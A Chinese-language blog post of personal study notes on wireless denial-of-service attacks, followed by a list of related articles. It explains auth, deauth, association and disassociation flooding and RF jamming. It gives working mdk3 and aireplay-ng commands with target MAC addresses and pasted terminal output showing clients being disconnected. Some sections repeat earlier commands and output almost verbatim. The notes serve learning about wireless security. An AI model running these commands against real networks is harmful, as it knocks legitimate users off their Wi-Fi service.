记录下自己最近一段时间对无线渗透学习的笔记。

无线DOS就是无线拒绝服务攻击。主要包括以下几种攻击类型:Auth Dos攻击、Deauth Flood攻击、Disassociate攻击及RF干扰攻击等。

无线DOS工具:MDK3、Charon(MDK3图形界面)、aireplay-ng

无线客户端状态:IEEE 802.11定义了一种客户端状态机制,用于跟踪工作站身份验证和关联状态。

一、Auth Flood攻击

Auth Flood攻击:即身份验证洪水攻击。该攻击目标主要针对那些处于通过验证、和AP建立关联的关联客户端,攻击者将向AP发送大量伪造的身份验证请求帧(伪造的身份验证服务和状态代码),当收到大量伪造的身份验证请求超过所能承受的能力时,AP将断开其他无线服务连接

攻击步骤:

1 使用airodump-ng wlan0mon 查看当前无线网络状况

2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]

其中:

a:表示的是authentication DOS模式

-a:攻击指定的AP,此处输入的是AP的MAC地址

-s:发送数据包速率

当攻击成功后,指定的AP会有很多的不存在的无线站点与之联系。

1 airodump-ng wlan0mon命令窗口

结果如下:

CH   ][ Elapsed:  mins ][ -- :                                                                                                            BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                               D8::0D:2D:CB:  -                    54e. WPA2 CCMP   PSK  2DCB58                                                BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           

 D8::0D:2D:CB:  F8:F2:BC:C6::5D         -                                                                                  

 D8::0D:2D:CB:  F3::CE:5E:A1:8A         -                                                                                  

 D8::0D:2D:CB:  BC:1A:0E:BD:3F:D1         -                                                                                  

 D8::0D:2D:CB:  :5B:DC:7C:DE:9F         -                                                                                  

 D8::0D:2D:CB:  A7::EC:CF:2B:5C         -                                                                                  

 D8::0D:2D:CB:  AA::1B:::C5         -                                                                                  

 D8::0D:2D:CB:  :EF:9B::A9:         -                                                                                  

 D8::0D:2D:CB:  AE:C1:8E:C0:B6:         -                                                                                  

 D8::0D:2D:CB:  :3C:B5:5D:E1:         -                                                                                  

 D8::0D:2D:CB:  C9::8B:1A:8F:7E         -                                                                                  

 D8::0D:2D:CB:  D9:A3::0F:F2:         -                                                                                  

 D8::0D:2D:CB:  :C5:::A8:5E         -                                                                                  

 D8::0D:2D:CB:  :EB:6C:::         -                  

2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下:

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

Connecting Client: F8:3B:::E8:AF to target AP: D8::0D:2D:CB:

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

Connecting Client: 5E::C2:3A:: to target AP: D8::0D:2D:CB:

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

Connecting Client: 8D:BC:1B:E5::C7 to target AP: D8::0D:2D:CB:

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!    

3 抓包查看无线流量情况

二、Deauth Flood攻击

Deauth Flood攻击即为取消验证洪水攻击,它旨在通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态。对于目前的工具来说,这种形式的攻击在打断客户无线服务方面非常有效和快捷。一般来说,在攻击者发送另一个取消身份验证帧之前,客户端会重新关联和认证以再次获取服务。攻击者反复欺骗取消身份验证帧才能使所有客户端持续拒绝服务。

攻击步骤:

1 使用airodump-ng wlan0mon来查看当前无线网络状况

2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2] 或也可以使用aireplay-ng -0 0来完成deauth 攻击

其中:

d:表示的是deauthentication/disassociation攻击模式

-c:针对的是无线网络工作频道,这里选择为1

-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避

-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表

攻击成功后,所属信道的AP的客户端会断开连接

1 airodump-ng wlan0mon 命令窗口,结果如下:

CH  ][ Elapsed:  mins ][ -- :                                         

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

D8::0D:2D:CB:  -                   54e. WPA2 CCMP   PSK  2DCB58                                           BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           

D8::0D:2D:CB:  FF:FF:FF:FF:FF:FF         -                                                                                  

 D8::0D:2D:CB:  ::C0:A9:E2:A6        1e-                                                                                

 D8::0D:2D:CB:  5C:E0:C5:1A::C9  -     - 1e                                                                               

 D8::0D:2D:CB:  :5A::2F::A0  -    0e- 1e           

2 mdk3 wlan0mon d -c 11

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB:

Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

3 抓包查看无线流量情况

三、Association Flood攻击

Association Flood攻击即为关联洪水攻击。在无线路由器或者接入点内置一个列表即为连接状态表,里面可显示出所有与该AP建立连接的无线客户端状态。它试图通过利用大量模仿和伪造的无线客户端关联来填充AP的客户端关联表,从而达到淹没AP的目的。

由于开放身份验证(空身份验证)允许任何客户端通过身份验证后关联。利用这种漏洞的攻击者可以通过创建多个到达已连接或已关联的客户端来模仿很多客户端,从而淹没目标AP的客户端关联表。

攻击步骤:

1 使用airodump-ng wlan0mon 查看当前无线网络状况

2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]

其中:

a:表示的是authentication DOS模式

-a:攻击指定的AP,此处输入的是AP的MAC地址

-s:发送数据包速率

当攻击成功后,指定的AP会有很多的不存在的无线站点与之联系。

1 airodump-ng wlan0mon命令窗口

结果如下

CH   ][ Elapsed:  mins ][ -- :                                         

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

D8::0D:2D:CB:  -                    54e. WPA2 CCMP   PSK  2DCB58                                               BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           

D8::0D:2D:CB:  F8:F2:BC:C6::5D         -                                                                                  

 D8::0D:2D:CB:  F3::CE:5E:A1:8A         -                                                                                  

 D8::0D:2D:CB:  BC:1A:0E:BD:3F:D1         -                                                                                  

 D8::0D:2D:CB:  :5B:DC:7C:DE:9F         -                                                                                  

 D8::0D:2D:CB:  A7::EC:CF:2B:5C         -                                                                                  

 D8::0D:2D:CB:  AA::1B:::C5         -                                                                                  

 D8::0D:2D:CB:  :EF:9B::A9:         -                                                                                  

 D8::0D:2D:CB:  AE:C1:8E:C0:B6:         -                                                                                  

 D8::0D:2D:CB:  :3C:B5:5D:E1:         -                                                                                  

 D8::0D:2D:CB:  C9::8B:1A:8F:7E         -                                                                                  

 D8::0D:2D:CB:  D9:A3::0F:F2:         -                                                                                  

 D8::0D:2D:CB:  :C5:::A8:5E         -                                                                                  

 D8::0D:2D:CB:  :EB:6C:::         -                  

2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下:

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

Connecting Client: F8:3B:::E8:AF to target AP: D8::0D:2D:CB:

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

Connecting Client: 5E::C2:3A:: to target AP: D8::0D:2D:CB:

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

Connecting Client: 8D:BC:1B:E5::C7 to target AP: D8::0D:2D:CB:

AP D8::0D:2D:CB: seems to be INVULNERABLE!      

Device is still responding with  clients connected!

AP D8::0D:2D:CB: seems to be INVULNERABLE!     

3 抓包查看无线流量情况

另外一种攻击模式就是攻击者集合了大量的无线网卡,或者是改装的集合大量无线网卡芯片的捆绑式发射机(类似于常说的“短信群发器”),如果进行大规模连接攻击,对于目前广泛使用的无线接入设备,也是很有效果的。

四、Disassociation Flood攻击

Disassociation Flood攻击即为取消关联洪水攻击,和deauthenticaiton flood攻击表现方式很相似。它通过欺骗从AP到客户端的取消关联帧来强制客户端成为未关联/未认证的状态。一般来说,在攻击者发送另一个取消关联帧之前,客户端会重新关联以再次获取服务。攻击者反复欺骗取消关联帧才能使客户端持续拒绝服务。

Disassociation Broadcast攻击和Disassociation Flood攻击原理基本一致,只是在发送程度及使用工具上有所区别,前者很多时候用于配合进行无线中间人攻击,而后者常用于目标确定的点对点无线DOS,比如破坏或干扰指定机构或部门的无线接入点等。

攻击步骤:

1 使用airodump-ng wlan0mon来查看当前无线网络状况

2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]

其中:

d:表示的是deauthentication/disassociation攻击模式

-c:针对的是无线网络工作频道,这里选择为1

-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避

-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表

攻击成功后,所属信道的AP的客户端会断开连接

1 airodump-ng wlan0mon 命令窗口,结果如下:

CH  ][ Elapsed:  mins ][ -- :                                         

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

D8::0D:2D:CB:  -                   54e. WPA2 CCMP   PSK  2DCB58                                             BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           

D8::0D:2D:CB:  FF:FF:FF:FF:FF:FF         -                                                                                  

 D8::0D:2D:CB:  ::C0:A9:E2:A6        1e-                                                                                

 D8::0D:2D:CB:  5C:E0:C5:1A::C9  -     - 1e                                                                               

 D8::0D:2D:CB:  :5A::2F::A0  -    0e- 1e           

2 mdk3 wlan0mon d -c 11

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB:

Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5::0C:A0 on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

Disconnecting between: :5A::2F::A0 and: D8::0D:2D:CB: on channel: 

3 抓包查看无线流量情况

五、RF Jamming攻击

RF Jamming攻击即为RF干扰攻击。该攻击是通过发出干扰射频达到破坏正常无线通信的目的。而前面几种攻击主要是基于无线通信过程及协议的。RF为射频,主要包括无线信号发射机及收信机等。

这里因环境限制身旁没有测试设备,所以具体的数据包无法展示,后面有机会再单独展开。

常见无线DOS攻击的更多相关文章

  1. 无线DOS攻击

    1.无线连接状态 IEEE 802.11定义了一种客户端状态机制,用于跟踪工作站身份验证和关联状态.无线客户端和AP基于IEEE标准实现这种状态机制.成功关联的客户站停留在状态3,才能进行无线通信.处 ...

  2. 几种常见的DoS攻击

    DoS为Denial of Service的简称,意思是拒绝服务.DoS攻击是一种使被攻击者无法正常提供服务的攻击.常见的攻击方式有以下几种类型:   LAND Local Area Network ...

  3. Linux下的DOS攻击

    Linux下的DOS攻击 DOS是Denial of service的简称,即拒绝服务,造成Dos攻击行为被称为Dos攻击,其目的是使计算机或网络无法提供正常的服务.最常见的Dos攻击有计算机带宽攻击 ...

  4. DOS攻击和DDOS攻击有啥区别啊

    DDOS是DOS攻击中的一种方法. DoS:是Denial of Service的简称,即拒绝服务,不是DOS操作系统,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务. ...

  5. dos攻击

    概念理解 DoS到底是什么?接触PC机较早的同志会直接想到微软磁盘操作系统的DOS--DiskOperationSystem?不,此DoS非彼DOS也,DoS即DenialOfService,拒绝服务 ...

  6. DOS攻击之详解--转载

    源地址没有找到,间接引用地址:http://wushank.blog.51cto.com/3489095/1156004 DoS到底是什么?接触PC机较早的同志会直接想到微软磁盘操作系统的DOS--D ...

  7. web攻击之四:DOS攻击

    DDOS是DOS攻击中的一种方法. DoS:是Denial of Service的简称,即拒绝服务,不是DOS操作系统,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务. ...

  8. Web常见几种攻击与预防方式

    DoS和DDoS攻击 DoS(Denial of Service),即拒绝服务,造成远程服务器拒绝服务的行为被称为DoS攻击.其目的是使计算机或网络无法提供正常的服务.最常见的DoS攻击有计算机网络带 ...

  9. 【网络安全】Dos攻击科普文

    目录 DOS攻击 什么是DOS攻击 攻击手段分类 具体的攻击方式举例 优秀博客参考 DDOS攻击 DOS攻击 什么是DOS攻击 DOS是Denial of Service的简称,用中文简单翻译就是拒绝 ...

随机推荐

  1. MySQL之库表详细操作

    一 库操作 1.创建数据库 1.1 语法 CREATE DATABASE 数据库名 charset utf8; 1.2 数据库命名规则 可以由字母.数字.下划线.@.#.$ 区分大小写 唯一性 不能使 ...

  2. python记录_day04(补充)

    列表删除 切片删除 del lis[1:3]  # 删除索引是1,2的元素 修改 索引切片修改 # 修改 lst = ["太白", "太", "五&q ...

  3. QPS 机器计算公式

    QPS = req/sec = 请求数/秒 QPS = 总请求数 / ( 进程总数 * 请求时间 )QPS: 单个进程每秒请求服务器的成功次数 原理:每天80%的访问集中在20%的时间里,这20%时间 ...

  4. 解决gitHub下载速度慢的问题

    转载:http://blog.csdn.net/x_studying/article/details/72588324 github被某个CDN被伟大的墙屏蔽所致. 解决方法: 1.访问http:// ...

  5. MySQL-1236问题处理

      2018年9月26日 9:25 现象:192.168.7.206.192.168.7.207互为双主,同步报错  1236   7.206现象如下 root@mysqldb 09:15  [mys ...

  6. 自建yum源解决Ceph搭建过程中从官网取包慢的问题

    最近项目组需要ceph环境,第一次搭建ceph,各种不顺,装了卸,卸了装,一遍又一遍地按照官网的操作进行.最气人的是网速差,从官网取包太慢.一轮尝试就浪费一上午. 因此想到本地新建yum源. 首先,按 ...

  7. wps去除首字母自动大写

    首字母大写功能在不是进行英文编写时是个“自作聪明”的功能,我们可能会想把它关掉.

  8. python中字典内置方法

  9. CAD绘制室外平台步骤5.3

    1.在平面上用直线划出台阶范围. “工具”“曲线工具”“线变复线”选择这几条线,它们就变成了一条线. “三维建模”“造型对象”“平板”选择这条封闭的线,回车,选择相邻门窗柱子等,回车输入平台厚度如“- ...

  10. NOI2019冬令营报到通知

    由中国计算机学会(CCF)主办的2019全国青少年信息学奥林匹克冬令营(CCF NOI 2019冬令营)将于2019年1月24日-31日在广州市第二中学举行.其中1月24日为报到日,1月31日为疏散日 ...